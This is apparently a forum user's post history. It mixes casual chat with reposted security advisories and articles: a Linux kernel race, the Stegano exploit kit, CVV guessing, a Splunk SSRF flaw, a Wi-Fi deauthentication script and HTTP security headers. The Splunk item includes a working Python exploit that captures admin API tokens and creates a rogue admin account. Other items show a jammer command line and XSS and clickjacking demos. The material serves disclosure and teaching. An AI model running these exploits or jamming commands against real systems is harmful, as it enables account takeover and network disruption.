Everything posted by Nytro

  1. By the way, with Chinese phones it's possible that all your personal data (contacts, SMS messages, etc.) ends up with the Chinese. Then again, with Romanian ones it ends up with our own people. Yes, stick with the Chinese phones; at least those guys don't know how to read the data.
  2. I bought them about a year ago, I think. Besides the fact that they are happy with it, it seems fine to me too.
  3. I got my folks an AllView P5 Quad and it does its job really well. It runs better than the Galaxy S4 I used to have.
  4. Enough with the nonsense: if you want something cheap and decent, get an AllView.
  5. Live: https://streaming.media.ccc.de/33c3
     Schedule: https://fahrplan.events.ccc.de/congress/2016/Fahrplan/schedule.html
     Videos: https://media.ccc.de/c/33c3
  6. Nytro

    Fun stuff

    Forta! ("Go!")
  7. Nytro

    Fun stuff

    Nationalist.
  8. Nytro

    Fun stuff

    Our fans (check the license plate): https://www.facebook.com/vladimir.enachescu/posts/10154846666986663
  9. Nytro

    Fun stuff

  10. A while back, a protest was organized against ACTA: https://ro.wikipedia.org/wiki/Acordul_comercial_de_combatere_a_contrafacerii On Facebook, 40,000 people announced they would come. In Piata Universitatii there were 400 of us. Oh, right, it was snowing and rather cold outside; at home on Facebook it's warm.
  11. Informative, but you already knew: http://www.digi24.ro/stiri/actualitate/politica/alegeri-parlamentare-2016/votul-incertitudinii-ce-alegeri-au-fost-astazi-prezidentiale-630145
  12. Go GovITHub, screw Dragnea!
  13. Linus has said more than once that he cares more about Linux being stable than being secure. In other words, he would rather keep a few local privilege escalations than have users hit a kernel PANIC.
  14. Nytro

    Hi

    My suggestion is to think carefully about your long-term future. You can do a lot with programming. As for Linux, install a distribution and play around with it. There are plenty of tutorials on just about anything, but you can start with what aelius said.
  15. CVE-2016-8655 Linux af_packet.c race condition (local root)

      From: Philip Pettersson <philip.pettersson () gmail com>
      Date: Tue, 6 Dec 2016 11:50:57 +0900

      Hello,

      This is an announcement about CVE-2016-8655, a race condition I found in Linux (net/packet/af_packet.c). It can be exploited to gain kernel code execution from unprivileged processes.

      The bug was introduced on Aug 19, 2011: https://github.com/torvalds/linux/commit/f6fb8f100b807378fda19e83e5ac6828b638603a
      Fixed on Nov 30, 2016: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c

      =*=*=*=*=*=*=*=*= BUG DETAILS =*=*=*=*=*=*=*=*=

      To create AF_PACKET sockets you need CAP_NET_RAW in your network namespace, which can be acquired by unprivileged processes on systems where unprivileged namespaces are enabled (Ubuntu, Fedora, etc). It can be triggered from within containers to compromise the host kernel. On Android, processes with gid=3004/AID_NET_RAW are able to create AF_PACKET sockets (mediaserver) and can trigger the bug.

      I found the bug by reading code paths that have been opened up by the emergence of unprivileged namespaces, something I think should be off by default in all Linux distributions given its history of security vulnerabilities.

      The problem is inside packet_set_ring() and packet_setsockopt(). We can reach packet_set_ring() by calling setsockopt() on the socket using the PACKET_RX_RING option. If the version of the packet socket is TPACKET_V3, a timer_list object will be initialized by packet_set_ring() when it calls init_prb_bdqc():

          ...
          switch (po->tp_version) {
          case TPACKET_V3:
              /* Transmit path is not supported. We checked
               * it above but just being paranoid
               */
              if (!tx_ring)
                  init_prb_bdqc(po, rb, pg_vec, req_u);
              break;
          default:
              break;
          }
          ...

      The function flow to set up the timer is:
      packet_set_ring()->init_prb_bdqc()->prb_setup_retire_blk_timer()->prb_init_blk_timer()->init_timer()

      When the socket is closed, packet_set_ring() is called again to free the ring buffer and delete the previously initialized timer if the packet version is > TPACKET_V2:

          ...
          if (closing && (po->tp_version > TPACKET_V2)) {
              /* Because we don't support block-based V3 on tx-ring */
              if (!tx_ring)
                  prb_shutdown_retire_blk_timer(po, rb_queue);
          }
          ...

      The issue is that we can change the packet version to TPACKET_V1 with packet_setsockopt() after init_prb_bdqc() has been executed and before packet_set_ring() has returned. There is an attempt to deny changing socket versions after a ring buffer has been initialized, but it is insufficient:

          ...
          case PACKET_VERSION:
          {
              ...
              if (po->rx_ring.pg_vec || po->tx_ring.pg_vec)
                  return -EBUSY;
              ...

      There's plenty of room to race this code path between the calls to init_prb_bdqc() and swap(rb->pg_vec, pg_vec) in packet_set_ring(). When the socket is closed, packet_set_ring() will not delete the timer since the socket version is now TPACKET_V1. The struct timer_list that describes the timer object is located inside the struct packet_sock for the socket itself, however, and will be freed with a call to kfree(). We then have a use-after-free on a timer object that can be exploited by various poisoning attacks on the SLAB allocator (I find add_key() to be the most reliable). This will ultimately lead to the kernel jumping to a manipulated function pointer when the timer expires.

      The bug is fixed by taking lock_sock(sk) in packet_setsockopt() when changing the packet version, while also taking the lock at the start of packet_set_ring().

      My exploit defeats SMEP/SMAP and will give a rootshell on Ubuntu 16.04. I will hold off a day on publishing it so people have some time to update. New Ubuntu kernels are out, so please update as soon as possible.

      =*=*=*=*=*=*=*=*= TIMELINE =*=*=*=*=*=*=*=*=

      2016-11-28: Bug reported to security () kernel org
      2016-11-30: Patch submitted to netdev, notification sent to linux-distros
      2016-12-02: Patch committed to mainline kernel
      2016-12-06: Public announcement

      =*=*=*=*=*=*=*=*= LINKS =*=*=*=*=*=*=*=*=

      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8655
      https://github.com/torvalds/linux/commit/f6fb8f100b807378fda19e83e5ac6828b638603a
      https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c
      https://www.ubuntu.com/usn/usn-3151-1/

      =*=*=*=*=*=*=*=*= CREDIT =*=*=*=*=*=*=*=*=

      Philip Pettersson

      Source: http://seclists.org/oss-sec/2016/q4/607
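As the advisory notes, exposure largely hinges on whether unprivileged user namespaces are enabled, which lets any local process grab CAP_NET_RAW in its own namespace. Below is a small best-effort check (my sketch, not part of the advisory; the sysctl paths are distro-specific assumptions, so treat the answer as a hint rather than a verdict):

```python
import os
import platform

def unprivileged_userns_enabled():
    """Best-effort check whether unprivileged user namespaces look enabled.

    kernel.unprivileged_userns_clone is the Debian/Ubuntu-specific knob;
    user.max_user_namespaces is the mainline limit introduced around 4.9.
    Both paths are assumptions about the running distro/kernel.
    """
    knob = "/proc/sys/kernel/unprivileged_userns_clone"
    if os.path.exists(knob):
        with open(knob) as f:
            return f.read().strip() == "1"
    limit = "/proc/sys/user/max_user_namespaces"
    if os.path.exists(limit):
        with open(limit) as f:
            return int(f.read().strip()) > 0
    return False  # cannot tell; assume namespaces are restricted

if __name__ == "__main__":
    print("kernel release:", platform.release())
    print("unprivileged userns enabled:", unprivileged_userns_enabled())
```

Even if the check comes back False, updating the kernel is the only real fix, since AF_PACKET sockets are also reachable with plain CAP_NET_RAW (root-started daemons, Android's AID_NET_RAW processes).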
  16. ARMv8 Shellcodes from 'A' to 'Z'

      Hadrien Barral, Houda Ferradi, Rémi Géraud, Georges-Axel Jaloyan and David Naccache
      École normale supérieure – Computer Science Department
      45 rue d'Ulm, 75230 Paris cedex 05, France
      firstname.lastname@ens.fr
      August 12, 2016

      Abstract: We describe a methodology to automatically turn arbitrary ARMv8 programs into alphanumeric executable polymorphic shellcodes. Shellcodes generated in this way can evade detection and bypass filters, broadening the attack surface of ARM-powered devices such as smartphones.

      Download: https://arxiv.org/pdf/1608.03415.pdf
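The filters the paper talks about evading are ones that only let alphanumeric bytes through. A minimal sketch of such a filter (illustrative only, not from the paper) shows what a shellcode built this way is designed to pass:

```python
# Bytes allowed by a strict alphanumeric input filter: [a-zA-Z0-9].
ALPHANUMERIC = frozenset(
    b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
)

def passes_alnum_filter(payload: bytes) -> bool:
    """True if every byte of the payload is alphanumeric ASCII.

    A shellcode produced by the paper's methodology passes this check;
    a typical raw-machine-code payload (NOP sleds, 0x00/0xcc bytes) does not.
    """
    return all(b in ALPHANUMERIC for b in payload)
```

The point of the paper is that passing such a filter no longer implies the input is harmless on ARMv8.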
  17. IoT is the future...
  18. Stegano exploit kit poisoning pixels
      BY PETER STANCIK, POSTED 6 DEC 2016 - 12:00PM

      ESET researchers have discovered a new exploit kit spreading via malicious ads on a number of reputable news websites, each with millions of visitors daily. Since at least the beginning of October 2016, the bad guys have been targeting users of Internet Explorer and scanning their computers for vulnerabilities in Flash Player. Exploiting these flaws in the code, they have been attempting to download and execute various types of malware.

      The attacks fall into the category of so-called malvertising, because the malicious code is distributed through advertising banners. To make things worse, the attackers responsible are using stealthy, even paranoid, techniques, which makes analysis quite complicated and has thus necessitated an extensive research report. I asked Robert Lipovsky, one of ESET's senior malware researchers, to give us a less technical overview of the case.

      What does your discovery mean for internet users?

      It means that there are advertising banners with "poisoned pixels" leading to a new exploit kit, intended to enable the bad guys to remotely install malware onto victims' computers. The victim doesn't even need to click on the malicious ad content; all it takes is to visit a website displaying it. If the victim's computer runs a vulnerable version of Flash Player, the machine will be compromised via an exploited vulnerability automatically. After that, the bad guys have all they need to download and execute the malware of their choice. Some of the payloads we analyzed include banking trojans, backdoors and spyware, but the victims could end up facing a nasty ransomware attack, for example. Once again this threat shows how important it is to have your software fully patched and to be protected by a reputable security solution. In this particular case, either of these measures fully protects you from this specific attack.

      Where are the poisoned pixels in this?

      Well, the name "Stegano" refers to steganography, a technique the bad guys used to hide parts of their malicious code in the pixels of the advertisements' banners. Specifically, they hide it in the parameters controlling the transparency of each pixel. This makes only minor changes to the (color) tone of the picture, making the changes effectively invisible to the naked eye and so unnoticed by the potential victim.

      How does the attack work?

      I believe the following scheme is the best way to explain what is happening in this case: [diagram omitted]

      Your analysis shows that the creators of the Stegano exploit kit are trying hard to stay unseen. What makes them so paranoid?

      Attackers have succeeded in circumventing the countermeasures designed to uncover and block malicious content on advertising platforms, which has resulted in legitimate websites unknowingly serving infected content to millions of potential victims. On top of that, the malicious version of the ad is served only to a specific target group, selected by the attackers' server. The decision-making logic behind the choice of target is unknown, and this helps the bad guys go further in dodging suspicion on the advertising platforms' side.

      But those are not the only reasons why they try hard to stay stealthy – and that's where the attackers get really paranoid. The crooks behind the Stegano exploit kit are also trying to stay off the radar of experienced cybersecurity research teams hunting for malware. Hiding code in the pixels would not be enough to escape this kind of attention, so they have implemented a series of checks to detect whether the code is being surveilled. If any kind of surveillance is detected, the exploit kit's activities simply stop and no malicious content is served.

      How do they know when the code is being observed?

      The exploit kit mainly tries to detect whether or not it is sitting in a sandbox, or if it is running on a virtual machine that was created for detection purposes. Also, the malware checks for any security software that might be present and sends this information to its operators.

      Can you say how many users have already seen these banners with poisoned pixels?

      Our detection systems show that in the last two months the malicious ads have been displayed to more than a million users on several very popular websites. Bear in mind, this is a rather conservative estimate based only on our own telemetry from users participating in ESET LiveGrid®. After all, the visitor counts of some of these websites are in the millions daily.

      Can you be more specific? Which websites were affected?

      The purpose of this research is to shed light on the activities of the bad guys and to make users safe from this threat. In this case, disclosure of the websites known to have been affected wouldn't add any extra value in this regard. On the contrary, it could provide a false sense of security to those who have not visited these sites, as the banners could have appeared on practically any website that displays ads. We should also mention the reputational harm this could inflict on victimized pages, especially since there is nothing they could have done to prevent these attacks, as the targeted ad space isn't completely under their control.

      What should I do to stay protected from exploit kit attacks?

      First of all, let me highlight again that those who are diligent in protecting their computers are safe from these specific attacks. Keeping both the system and all applications patched and using a reliable internet security solution are strong precautions that help prevent such attacks. However, for unwary users, malvertising poses a serious threat, and their only hope is that malicious banners won't make it onto websites they visit.

      Source: http://www.welivesecurity.com/2016/12/06/stegano-exploit-kit/
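The "parameters controlling the transparency of each pixel" are the alpha channel. The general idea, stripped of the kit's obfuscation, is ordinary least-significant-bit steganography: flipping the low bit of each alpha value changes it by at most 1, which is invisible to the eye. An illustrative sketch (my code, not the Stegano kit's; pixels are plain (r, g, b, a) tuples):

```python
def embed(pixels, payload):
    """Hide payload bits in the alpha LSB of the first len(payload)*8 pixels."""
    bits = [(byte >> i) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("image too small for payload")
    stego = [
        (r, g, b, (a & ~1) | bit)  # alpha moves by at most 1
        for (r, g, b, a), bit in zip(pixels, bits)
    ]
    return stego + pixels[len(bits):]

def extract(pixels, nbytes):
    """Read nbytes back out of the alpha LSBs, same bit order as embed()."""
    bits = [a & 1 for (_r, _g, _b, a) in pixels[: nbytes * 8]]
    return bytes(
        sum(bit << i for i, bit in enumerate(bits[j * 8:(j + 1) * 8]))
        for j in range(nbytes)
    )
```

A banner script on the attacker's side would run the equivalent of extract() over the ad image and eval the result, which is why the payload never appears in the ad's source.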
  19. Do NOT try this! How to guess credit card security codes
      by Paul Ducklin

      If you've ever used your credit card online, or over the phone, you've probably been asked for something known informally as the "short code" or "security code". That's usually a three-digit number physically printed (but not embossed) at the right-hand end of the signature strip on the back of your card.

      Three digits don't sound enough to make much of a password, and in normal circumstances they wouldn't be. But for what are known as card-not-present transactions, the CVV, or Card Verification Value as it is commonly known, provides a handy degree of protection against one of the most common sorts of credit card fraud, namely skimming.

      Skimming is where the crooks use a booby-trapped card reader, for example glued over the real card reader on an ATM, or cunningly squeezed into the card slot on a payment terminal, to read and record the magnetic stripe on your card. Even if you have a Chip and PIN card, the magstripe contains almost enough information for a crook to convince a website they have your card. For example, your name as it appears on the front of the card, the "long code" (usually 16 digits across the face of the card) and the expiry date are all there on the magstripe, ready to be copied surreptitiously and used on the web.

      The CVV therefore acts as a very low-tech barrier to card-not-present fraud, because most websites also require you to type in the CVV, which is not stored on the magstripe and therefore can't be skimmed. Of course, there are numerous caveats here, including:

      • The vendor mustn't store your CVV after the transaction is complete. The security usefulness of the CVV depends on it never lying around where it could subsequently fall foul of cyberthieves.
      • The payment processor mustn't allow too many guesses at your CVV. With unlimited guesses and a three-digit code, even a crook working entirely by hand could try all the possibilities within a few hours.

      Guessing CVVs

      Researchers at Newcastle University in the UK recently decided to see just how effectively the second caveat was enforced, by trying to guess CVVs. The initial findings were encouraging: after a few guesses on the same website, they'd end up locked out and unable to go any further.

      Then they tried what's called a distributed attack, using a program to submit payment requests automatically to lots of websites at the same time. You can see where this is going. If each website gives you five guesses, then with 200 simultaneous guesses on a range of different websites, you can get through 1000 guesses (200 × 5) in quick order without triggering a block on any of the sites. And with 1000 guesses, you can cover all CVV possibilities from 000 to 999, stopping when you succeed.

      Then you can go to a 201st site and order just about whatever you like, because you've "solved" the CVV without ever actually seeing the victim's card. In other words, you'd expect the payment processor's back-end servers to keep track not just of the number of CVV guesses from each site, but the total number of guesses since your last successful purchase from any site. According to Newcastle University, Mastercard stopped this sort of distributed guessing, but Visa did not.

      Should you worry?

      Considering how much credit card fraud happens without any need for CVV-guessing tricks like this, we don't think this is a signal to give up online purchases entirely this festive season. After all, if any of the sites or services you used recently kept your CVV, even if only to write it down temporarily while processing your transaction, you're exposed anyway, so CVVs aren't a significant barrier to determined crooks. And if you've ever put your card details into a hacked or fraudulent website – even (or perhaps especially) if the transaction was never finalised – then the crooks probably already have everything they need to clone your card.

      What to do?

      A few simple precautions will help, regardless of your card provider:

      • Don't let your card out of your sight. Crooks working out of sight, even for just a few seconds, can skim your card easily simply by running it through two readers. They can also snap a sneaky picture of the back of the card to record both your signature and the CVV.
      • Try to use the Chip and PIN slot when paying in person. Most chip readers only require you to insert your card far enough to connect up to the chip. This leaves most of the magstripe sticking out, making skimming the card details harder. If in doubt, find another retailer or ATM.
      • Most ATMs still require you to insert your whole card, and can therefore be fitted with glued-on magstripe skimmers. If you aren't sure, why not get hold of the reader and give it a wiggle? Skimmers often don't feel right, because they aren't part of the original ATM.
      • Stick to online retailers you trust. Check the address bar of the payment page, make sure you're on an encrypted (HTTPS) site, and if you see any web certificate warnings, bail out immediately.
      • Keep an eye on your statements. If your bank has a service to send you a message notifying you when transactions take place, consider turning it on.

      Source: https://nakedsecurity.sophos.com/2016/12/05/how-to-guess-credit-card-security-codes/
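The arithmetic behind the distributed attack is worth making explicit: the attacker is simply dividing the code space across sites so that no single site sees more guesses than its limit allows. A small sketch of that calculation (mine, for illustration):

```python
import math

def sites_needed(code_space=1000, guesses_per_site=5):
    """Sites required to cover the whole code space without any one site
    seeing more than its per-card guess limit (the article's 200 x 5 = 1000)."""
    return math.ceil(code_space / guesses_per_site)

def expected_guesses(code_space=1000):
    """On average, a uniformly random code is found halfway through the space."""
    return code_space / 2
```

This is also why the article's proposed defence works: a counter of total failed guesses per card, shared across all merchants, caps the attacker at one site's limit no matter how many sites they spread the guesses over.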
  20. From: Francesco Oddo <francesco.oddo () security-assessment com>
      Date: Fri, 9 Dec 2016 14:54:02 +1300

      Security-Assessment.com presents..

      Splunk Enterprise Server-Side Request Forgery
      Affected versions: Splunk Enterprise <= 6.4.3
      PDF: http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf

      +-----------+
      |Description|
      +-----------+
      The Splunk Enterprise application is affected by a server-side request forgery vulnerability. This vulnerability can be exploited by an attacker via social engineering or other vectors to exfiltrate authentication tokens for the Splunk REST API to an external domain.

      +------------+
      |Exploitation|
      +------------+
      ==Server-Side Request Forgery==

      A server-side request forgery (SSRF) vulnerability exists in the Splunk Enterprise web management interface within the Alert functionality. The application parses user-supplied data in the GET parameter 'alerts_id' to construct a HTTP request to the splunkd daemon listening on TCP port 8089. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make a HTTP request to an arbitrary destination host.

      The issue is aggravated by the fact that the application includes the REST API token for the currently authenticated user within the Authorization request header. This vulnerability can be exploited via social engineering to obtain unauthorized access to the Splunk REST API with the same privilege level of the captured API token.

      [POC SSRF LINK]
      /en-US/alerts/launcher?eai%3Aacl.app=launcher&eai%3Aacl.owner=*&severity=*&alerts_id=[DOMAIN]&search=test

      The proof of concept below can be used to listen for SSRF connections and automatically create a malicious privileged user when an administrative token is captured.

      [POC - splunk-poc.py]

          from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
          import httplib
          import ssl
          import requests

          token = ''

          class MyHandler(BaseHTTPRequestHandler):
              def do_GET(self):
                  global token
                  try:
                      token = self.headers.get('Authorization')[7:]
                      print "[+] Captured Splunk API token from GET request"
                  except Exception, e:
                      print "[-] No API token captured on incoming connection..."

          def adminTokenNotCaptured():
              global token
              if token:
                  query = "/services/authentication/httpauth-tokens/" + token
                  conn = httplib.HTTPSConnection("<SPLUNK IP>", 8089,
                                                 context=ssl._create_unverified_context())
                  conn.putrequest("GET", query)
                  conn.putheader("Authorization", "Splunk %s" % token)
                  conn.endheaders()
                  context = conn.getresponse().read()
                  if 'userName">admin' in context:
                      print "[+] Confirmed Splunk API token belongs to admin user"
                      print "[+] Admin Splunk API Token: %s" % token
                      return False
                  else:
                      print "[!] Splunk API token does not belong to admin user"
              return True

          def poc():
              global token
              create_user_uri = "https://<SPLUNK IP>:8089/services/authentication/users"
              params = {'name': 'infosec', 'password': 'password', 'roles': 'admin'}
              auth_header = {'Authorization': 'Splunk %s' % token}
              requests.packages.urllib3.disable_warnings()
              response = requests.post(url=create_user_uri, data=params,
                                       headers=auth_header, verify=False)
              if "<title>infosec" in response.content:
                  print "[+] POC admin account 'infosec:password' successfully created"
              else:
                  print "[-] No account was created"
                  print response.content

          if __name__ == "__main__":
              try:
                  print "[+] Starting HTTP Listener"
                  server = HTTPServer(("", 8080), MyHandler)
                  while adminTokenNotCaptured():
                      server.handle_request()
                  poc()
              except KeyboardInterrupt:
                  print "[+] Stopping HTTP Listener"
                  server.socket.close()

      +----------+
      | Solution |
      +----------+
      Update to Splunk 6.5.0 or later. Full information about all patched versions is provided in the reference links below.
      +------------+
      | Timeline |
      +------------+
      24/08/2016 – Initial disclosure to vendor
      25/08/2016 – Vendor acknowledges receipt of the advisory and confirms vulnerability
      28/09/2016 – Sent follow-up email asking for status update
      30/09/2016 – Vendor replies that fixes are being backported to all supported versions of the software
      10/11/2016 – Vendor releases security advisory and patched software versions
      09/12/2016 – Public disclosure

      +------------+
      | Additional |
      +------------+
      http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf
      https://www.splunk.com/view/SP-CAAAPSR [SPL-128840]

      Source: http://seclists.org/fulldisclosure/2016/Dec/30
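The root cause is that 'alerts_id' is used as a request target without validation. The advisory doesn't show Splunk's actual patch, but the generic server-side fix for this class of SSRF is to allowlist the host/port before building the proxied request, so the Authorization header can never travel to an attacker-chosen host. A sketch under those assumptions (names and defaults are mine, not Splunk's code):

```python
from urllib.parse import urlparse

# Where the backend is legitimately allowed to send the proxied request:
# splunkd on the local management port. Assumed defaults, for illustration.
ALLOWED_HOSTS = {"127.0.0.1", "localhost"}
ALLOWED_PORTS = {8089}

def is_safe_target(alerts_id: str) -> bool:
    """Reject any alerts_id value that would route the request (and its
    Authorization header) to a host or port outside the allowlist."""
    value = alerts_id if "//" in alerts_id else "//" + alerts_id
    parsed = urlparse(value)
    host = (parsed.hostname or "").lower()
    port = parsed.port if parsed.port is not None else 8089
    return host in ALLOWED_HOSTS and port in ALLOWED_PORTS
```

With a check like this in front of the request builder, the PoC's listener on [DOMAIN]:8080 would never receive a connection, let alone a token.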
  21. New Smartwatch OS Debuts on GitHub
      By John P. Mello Jr., Dec 9, 2016 7:00 AM PT

      Can a new smartwatch operating system based on Linux breathe some new life into the smart wearables market? Florent Revest hopes so. Revest, a French computer science student, on Wednesday announced the alpha release of AsteroidOS, an open source operating system that will run on several Android smartwatch models. "Many users believe that the current proprietary platforms can not guarantee a satisfactory level of control over their privacy and hardware," noted Revest, who has been working on his OS for two years. "Hence, I noticed a need for an open wearable platform and AsteroidOS is my attempt to address this issue." The alpha edition of AsteroidOS contains some basic apps: agenda, for scheduling events to remember; an alarm clock; a calculator; music, for controlling the music player on a phone; a stopwatch; a timer; and a weather app. The OS will run, more or less, on the LG G Watch, LG G Urbane, Asus ZenWatch 2 and Sony Smartwatch 3, Revest noted. Bluetooth works only on the G Watch, though.

      Uphill Battle

      Launching an open source mobile operating system can be a daunting and seemingly futile task. "This has been tried repeatedly in the past and has failed," said Jack E. Gold, principal analyst at J.Gold Associates. So far there's only been one open source success story in the mobile market, and that's been Android -- which eventually was consumed by Google and closed off, noted Patrick Moorhead, principal analyst at Moor Insights and Strategy. "Firefox, Meego and Ubuntu have tried this and, unfortunately, haven't met with success," he told LinuxInsider.

      Breaking From Past

      However, Revest's focus on smartwatches may give his OS a better chance of success than past open source efforts had, said Charles King, principal analyst at Pund-IT.
"There's certainly no guarantee that AsteroidOS can breathe life into so stagnant a market -- but at the same time, the new OS won't encounter the barriers it would in more mature markets, such as smartphones," he told LinuxInsider. "There's a hole in the market for this," said Ross Rubin, principal analyst at Reticle Research. "Unlike the phone and tablet market, where you can use the Android open source platform and build something based on that, there really hasn't been much for smartwatches," he told LinuxInsider. Google offers a form of Android for wearables, but it can't be modified the way the open source version of Android can. Narrow Appeal While Revest envisions growth of AsteroidOS as an open source community builds around it and it becomes compatible with more devices, broad adoption may be a long shot. Manufacturers who produce custom phones for target markets, such as low cost phones for emerging markets, might be interested in AsteroidOS, suggested Gold. However, "you can do this with Android-Linux already," he told LinuxInsider, "and with a new OS, there will be no availability of apps, so the devices will be very unattractive." Chinese phone makers who use open source Android may use AsteroidOS to produce very inexpensive smartwatches, said Rubin, "but inexpensive smartwatches haven't been driving the market. Pebble was an inexpensive smartwatch, and look what happened to it." The early adopters of the OS will be Linux enthusiasts and hobbyists, King said. Since the OS can work on older watches, early users likely will run the software on second-hand hardware. "That's a dynamic that drove significant early interest in Linux during the mid- to late-1990s, when people ported the OS to a wide variety of x86-based PCs and servers that were well past their prime," King recalled. Many of the initial users of AsteroidOS likely will be developers and Linux evangelists, he said. 
      "If AsteroidOS can gain a foothold with them, it could well spark commercial interest and adoption further down the road."

      Pebble Crushed

      Revest's announcement came on the same day that news broke that one of the pioneers in the smartwatch market, Pebble, has been purchased by Fitbit, reportedly for US$40 million. Fitbit, a fitness band maker, made the purchase to acquire key personnel and intellectual property. The deal does not include Pebble's hardware, which will be discontinued.

      The smartwatch market took a tumble in the third quarter, according to IDC. Shipments of wearable products were up 3.1 percent -- to 23.0 million from 22.3 million in the same quarter a year ago -- the firm reported earlier this week. "It's still early days, but we're already seeing a notable shift in the market," observed IDC Senior Research Analyst Jitesh Ubrani. "Where smartwatches were once expected to take the lead, basic wearables now reign supreme."

      John Mello is a freelance technology writer and contributor to Chief Security Officer magazine.

      Source: http://www.linuxinsider.com/story/84154.html?rss=1
  22. Nytro

    jammer

    jammer – A Bash script to automate the continuous circular deauthentication of all the wifi networks in your reach.

    I am not responsible for any misuse of the script. Keep in mind that it is generally illegal to use the script in your neighborhood; it is designed for pen-testing purposes. It has only been tested on my two machines, so there may still be bugs that can even cause data loss. That's why I suggest you take a good look at the code before you execute it. There will be updates as soon as I fix something or make a nice improvement. Not that anyone will see this.

    Jammer v0.3
    Usage: jammer [OPTION] ...
    Jam Wifi Networks That Your Wireless Card Can Reach.

      -d, --deauths:   Set the number of deauthentications for each station. Default is 10
      -y, --yes:       Make 'Yes' the answer for everything the script asks
      -s, --endless:   When reaching the end of the list, start again
      -f, --whitelist: A file with ESSID's to ignore during the attack
      -k, --keep:      Keep the scan files after the script ends
      -n, --name:      Choose the names the scan files are saved as
      -e, --ethernet:  Set the name for the ethernet interface. Default is 'eth0'
      -w, --wireless:  Set the name for the wireless interface. Default is 'wlan0'
      -h, --help:      Show this help message

    Looking at this help message, a suggested way to call the script is:

      $ sudo ./jammer -y -s -d 20 -f whitelist.txt

    Source: https://github.com/billpcs/jammer
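The -f/--whitelist option above is the part worth understanding before running anything: scanned networks whose ESSID appears in the whitelist file are skipped. A sketch of that filtering step (my illustration in Python; jammer itself is Bash, and the data shapes here are assumptions):

```python
def load_whitelist(path):
    """One ESSID per line; blank lines ignored."""
    with open(path) as f:
        return {line.strip() for line in f if line.strip()}

def filter_targets(networks, whitelist):
    """Drop any scanned network whose ESSID is whitelisted.

    networks: list of dicts with at least an 'essid' key
    (e.g. parsed rows from an airodump-ng scan file).
    """
    return [n for n in networks if n["essid"] not in whitelist]
```

Putting your own AP (and any network you don't have permission to test) in the whitelist is the minimum precaution the README is hinting at.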
  23. Exotic HTTP Headers
      Exploration of HTTP security and other non-typical headers
      Last updated on December 9, 2016

      Table of Contents: X-XSS-Protection, X-Frame-Options, X-Content-Type-Options, Content-Security-Policy, and others (Strict-Transport-Security, Public-Key-Pins, Content-Encoding: br, Timing-Allow-Origin, Alt-Svc, P3P).

      X-XSS-Protection

      Cross-Site Scripting (XSS) is an attack in which malicious scripts can be injected on a page. For example:

          <h1>Hello, <script>alert('hacked')</script></h1>

      This is a pretty obvious attack and something that browsers can block: if a part of the request shows up verbatim in the source code, it might be an attack. The X-XSS-Protection header controls this behavior.

      Values:
      • 0 – Filter disabled.
      • 1 – Filter enabled. If a cross-site scripting attack is detected, in order to stop the attack, the browser will sanitize the page.
      • 1; mode=block – Filter enabled. Rather than sanitize the page, when a XSS attack is detected, the browser will prevent rendering of the page.
      • 1; report=http://domain/url – Filter enabled. The browser will sanitize the page and report the violation. This is a Chromium function utilizing CSP violation reports to send details to a URI of your choice.

      Let's create a simple web server with node.js to play with this:

          var express = require('express')
          var app = express()
          app.use((req, res) => {
            if (req.query.xss) res.setHeader('X-XSS-Protection', req.query.xss)
            res.send(`<h1>Hello, ${req.query.user || 'anonymous'}</h1>`)
          })
          app.listen(1234)

      I am using Google Chrome 55.
      No header

      http://localhost:1234/?user=<script>alert('hacked')</script>

      Nothing happens. The browser successfully prevented this attack. This is the default behavior in Chrome if no header is set, as you can see in the error message in the Console. It even helpfully highlights it in the source.

      X-XSS-Protection: 0

      http://localhost:1234/?user=<script>alert('hacked')</script>&xss=0

      Oh no!

      X-XSS-Protection: 1

      http://localhost:1234/?user=<script>alert('hacked')</script>&xss=1

      The attack was successfully blocked by sanitizing the page because of our explicit header.

      X-XSS-Protection: 1; mode=block

      http://localhost:1234/?user=<script>alert('hacked')</script>&xss=1; mode=block

      The attack is blocked by simply not rendering the page.

      X-XSS-Protection: 1; report=http://localhost:1234/report

      http://localhost:1234/?user=<script>alert('hacked')</script>&xss=1; report=http://localhost:1234/report

      The attack is blocked and also reported to an address of our choice.

      X-Frame-Options

      This header allows you to prevent clickjacking attacks. Imagine that an attacker has a YouTube channel and he needs subscribers. He can create a website with a button that says "Do not click", which means that everyone will definitely click on it. But there's a completely transparent iframe on top of the button. When you click the button, you actually click on the Subscribe button on YouTube. If you were logged into YouTube, you are now subscribed to the attacker.

      Let's illustrate this. First, install the Ignore X-Frame headers extension. Then create this HTML file:

          <style>
            button {
              background: red;
              color: white;
              padding: 10px 20px;
              border: none;
              cursor: pointer;
            }
            iframe {
              opacity: 0.8;
              z-index: 1;
              position: absolute;
              top: -570px;
              left: -80px;
              width: 500px;
              height: 650px;
            }
          </style>
          <button>Do not click this button!</button>
          <iframe src="https://youtu.be/dQw4w9WgXcQ?t=3m33s"></iframe>

      As you can see, I have cleverly positioned the viewport of the iframe over the Subscribe button. The iframe is on top of the button (z-index: 1), so when you try to click the button you click on the iframe instead.
In this example, the iframe is not completely hidden, but I could do that with opacity: 0. In practice this particular page does not work because you are not logged into YouTube inside the iframe, but you get the idea.

You can prevent your website from being embedded in an iframe with the X-Frame-Options header.

Values:

- `deny`: No rendering within a frame.
- `sameorigin`: No rendering if the origins do not match.
- `allow-from: DOMAIN`: Allows rendering only if the embedding frame is loaded from DOMAIN.

We are going to use this web server for the experiments:

```javascript
var express = require('express')

for (let port of [1234, 4321]) {
  var app = express()
  app.use('/iframe', (req, res) => res.send(`<h1>iframe</h1><iframe src="//localhost:1234?h=${req.query.h || ''}"></iframe>`))
  app.use((req, res) => {
    if (req.query.h) res.setHeader('X-Frame-Options', req.query.h)
    res.send('<h1>Website</h1>')
  })
  app.listen(port)
}
```

### No header

Everyone can embed our website at localhost:1234 in an iframe.

- http://localhost:1234/iframe
- http://localhost:4321/iframe

### X-Frame-Options: deny

